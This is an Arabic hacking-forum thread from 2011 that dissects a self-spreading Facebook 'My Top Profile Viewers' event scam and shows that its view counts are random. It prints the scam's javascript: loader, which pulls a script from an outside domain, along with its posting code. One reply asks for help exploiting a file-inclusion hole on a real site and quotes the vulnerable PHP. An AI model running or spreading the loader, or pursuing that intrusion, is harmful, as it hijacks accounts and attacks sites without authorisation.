شرح ثغره الايفنت ونشرها تحت اسم "Edit My Top Profile Viewers Are" بالفيس بوك

KaLa$nikoV · 04-24-2011, 01:14 PM

السلام عليكم ورحمه الله وبركاته

من فتره قصيره انتشرت ثغره

event

بين كثير من الشباب الي بحبو يعرفو مين الي شاهد بروفايلهم

للاسف ما حد راضي يقتنع انو هاد الكلام كذب وما رح تقدر

تعرف مين الي شاهد بروفايلك

يعني فكك مني راح اضل اتجسس ع بروفايلك ومالك دعوه :P

ههههههههههه

نشوف الثغره الي جديد طلعت واستغلوها الهاكرز بشغل غبي

طبعا الثغره مجرد ازعاج

عباره عن حلقه مغلقه

يعني تنشر نفسها بنفسها من خلال الايفنت

boot event

اتفقت انا وصاحبي

cyber

نعمل اكاونت نفتح فيه الايفنت عشان نحلله ونعرف ايش الي بصير

----------
هام

اقرا الي بكتبه لكن مش ضروري اتطبق بلاش تروح انت الثاني بستين داهيه

ومحد يساوي حريف يحاول يحلل اكواد اذا مكنش فاهم كل خطوه بعملها

---------
اول ما فتحنا اللثغره هذا ما حصل

طيب يا زريقي نفتح ال
post
ألي اجاني منه
tag :P

---

هون انا بدي اركز ع شغلتين
السهم الازرق
199 views
لوني بالفيس بوك من ايام ما سيدي بقى عايش ما وصل لهاد الرقم الاحترافي :P
(بلش عبدو يتخوت وهو مداوم ببروفايلات العالم بقى ليه)

الاشي الثاني الي راح نركز عليه هو السهم الاحمر
وبالاخص تحت الخط الاخضر

هاد اللنك هو بدايه الحلقه المغلقه
ومن هنا تبدا الحكايه
بلش شغلنا ببتبع الثغره وتحليلها

كل الي بدي اياه من النك والصفحه الي قدامي هو هاد الكود
javascript:(a=(b=********).createElement('script') ).src='//bbbindia4.in/jsp.php',b.body.appendChild(a);void(0)

كود بسيط خفيف نظيف ومبين نص سطر
لكن حقيقه هو مليون امر مخفيات تحت اللنك الي باللون الاحمر

نحلل اللنك الي عنا
jsp.php
نشوف الحلاوه الي طلعت معي

هاي مجرد خرابيط ب5 اسطر لسا الكود الكبيير ما ظهر والي هو سبب المصايب
نفتح السوس بيج وراح نحصل ع الثغره الي مجننه الشعب

طيب راح يطلع معانا كلام حوالي 321 سطر
تذكرو بالبدايه كلها كانت نصف سطر

الي بهمني من هاد الكلام كله اني اثبت لكم
صدق او كذب الاعلان الي حصل بخصوص
My Top Profile Viewers

الي يلزمنا نحلل هاد الكود

اقتباس


	var message = '%firstname% See who views your Profile '; var ev = 'check out this new facebook feature! \x0A see your Profile view results by copying and pasting the link below in the address bar \x0A '; var test = 'My Top Profile Viewers Are:\x0A'; var id = '%tf% - ' + randomnumber1 + ' views,\x0A'; var id1 = '%tf% - ' + randomnumber2 + ' views,\x0A'; var id2 = '%tf% - ' + randomnumber3 + ' views,\x0A'; var id3 = '%tf% - ' + randomnumber4 + ' views,\x0A'; var post = ' see who viewed your facebook Profile @ '; var postmessage = test + id + id1 + id2 + id3 + post + url + randomnumber; var chatmessage = message + url + randomnumber; var redirect = 'http://www.gameindiagame.blogspot.com/'; var eventdesc = ev + url + randomnumber; var eventname = 'How to see who viewed your profile!!'; var nfriends = 5000;

راح اشرحه شرح سريع عشان انا عارف اغلب الي رح يقراو الكود ما رح يفهمو شيء
الكود بقولك اطبع الكلام هاد
My Top Profile Viewers Are
وانزل سطر
اطبع
اسم شخص من الفرندس وطبع مقدار مشاهدته للبروفايل
هون رح نركز شويه
مقدار مشاهدته للبروفايل
هو رقم عشوائي
randomnumber1
الي بتبع الكود بلقى الكل رقم عشوائي
اذن صفا لنا الكود راح ينزل لنا اسماء عشوائيه من الفرندس عنا
ويضع لنا مشاهدات بارقام عشوائيه

:party:
قلتلكم كذب بكذب

طيب هيك خلصنا كشف الغطاء عن الخداع
ونصيحه مني لا تصدقو هيك كلام مره ثانيه
وفي كمان كذبه اتصل من الفيس بوك مجانا لكن بحس نفسي سخيف لو شرحتها ....(شو عرفك انها كذبه قال من كبرها)

وان شاء الله هاد الشرح يكون كفاره عن .......
(والله بطلع مديون)

طبعا تم سحب الثغره واح نعدلها لاشي اخطر لكن ما رح ننشرها
الا في
VBSPIDERS VIP SECTION

بكل بساطه ما بدي ينتشر الموضوع بين ناس تخرب وتكركب
just to have more best security and info about hacking
visit us http://www.facebook.com/vbspiders
hack to learn not learn hack

DiV by VoLc4n0
وسنه طيبه ع الاخوان المسيحين بمناسبه عيد الفصح
:party:

المصدر: :: vBspiders Professional Network ::

avp eyvi hghdtkj ,kavih jpj hsl "Edit My Top Profile Viewers Are" fhgtds f,;

k4$p3r-MA · 04-24-2011, 01:38 PM

NiC3 FuN فهمت شوي
خخخخخخخخخ

شكرااا اخي عبدو على الشرح

PinG^^ · 04-24-2011, 02:06 PM

يعطيك العافية
بارك الله فيك
+ 6 نجووم
بطل

ChucK NoRRis · 04-24-2011, 02:26 PM

شكرا شرح كافي للفهم

والله البارحة تلقيت عديد الدعوات للمشاركة في هذا الافنت من مختلف الأصدقاء

ومارديت لانو ما يقلقني كم من مرة تمت زيارة البروفيل

ما أدري ليش هالخرفان يحبو يعرفو عدد الزيارات !!

°l||l° نور الظلام °l||l° · 04-24-2011, 08:20 PM

فهمت ولكن لي تعقيب اخ KaLa$nikoV
انا مرور الشخص للبروفايل لسؤال ؟اعتقد هي شي واضح ومعلوم للكل ؟!
اشكرك ويا كثرر ما ينزلوو وبا الاخيرر يطلع الثغره كذب بكذب
مشكووور :great:
وجزاك الله كل خيررر:party:

KaLa$nikoV · 04-27-2011, 09:57 PM

اقتباس


	انا مرور الشخص للبروفايل لسؤال ؟

من بعد اذنك لم افهم
ممكن الكتابه بلغه عربيه فصحى

04-28-2011, 01:36 AM

ايه أخ عبدو كنت عارف هاي الكدبة
و شكراا للتوضيح ان شاء الله نقوم باستغلالها بارك الله فيك
بالنسبة ل

اقتباس


	وان شاء الله هاد الشرح يكون كفاره عن .......

يا مان انسى هدا
و الله مالك غالط بشي ....
هههههه
و لكن لاتعيدها
بالتوفيق

mr_badz · 04-28-2011, 07:58 PM

مشكووووووووووووور وووصل يا بطل

neo-m · 05-19-2011, 02:30 PM

mercii

neo-m · 05-19-2011, 02:30 PM

مشكور

hank00sh · 06-02-2011, 04:03 PM

يسلمو فلكانو

حتى انا ما صدقت حكايه الاتصال المجاني من الفيس بوك من احد الاخوى منزل موضوع

هههههههههههههههههاي

وفيه واحد رد عليه وجرب التجربه ونفعت معاه بس انا متاكد فيه شي

تقبل مروري

b10001 · 07-02-2011, 02:35 PM

oké__________oké

me________me

you_____you

JetLi · 07-03-2011, 03:21 PM

السلام عليكم لدى احد المواقع ثغرة RFI صعبة الاستغلال جربت فيه اجميع الحيل حتى %00 جربته
هذه الثغرة على ما اعتقد كود البي اتش بي بها هو

كود PHP:

  // lang value are 'en' so full address will be "enlanguage/language.php"

 
$s=$_GET['lang']."language/language.php";

require_once($s);

 
.....

افيدوني كيف استفيد منها مع انها حاظرة http: وتعطي خطأ هل يمكنيي استخدامها كـ
LFI ?:jap:

المخترق الصغير · 07-04-2011, 03:47 PM

شكر لك اخي عبدو عالشرح

المخترق الصغير · 07-04-2011, 03:50 PM

اقتباس

المشاركة الأصلية كتبت بواسطة IronMan


	السلام عليكم لدى احد المواقع ثغرة RFI صعبة الاستغلال جربت فيه اجميع الحيل حتى %00 جربته هذه الثغرة على ما اعتقد كود البي اتش بي بها هو كود PHP: `// lang value are 'en' so full address will be "enlanguage/language.php" $s=$_GET*91;'lang'*93;."language/language.php"; require_once($s); .....` افيدوني كيف استفيد منها مع انها حاظرة http: وتعطي خطأ هل يمكنيي استخدامها كـ LFI ?:jap:

اخي ضع الرد في القسم الخاص هدا موضوع الاخ عبدو و يتحدث عن ثغرة اخرى ..:yes:

شرح ثغره الايفنت ونشرها تحت اسم "Edit My Top Profile Viewers Are" بالفيس بوك

قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات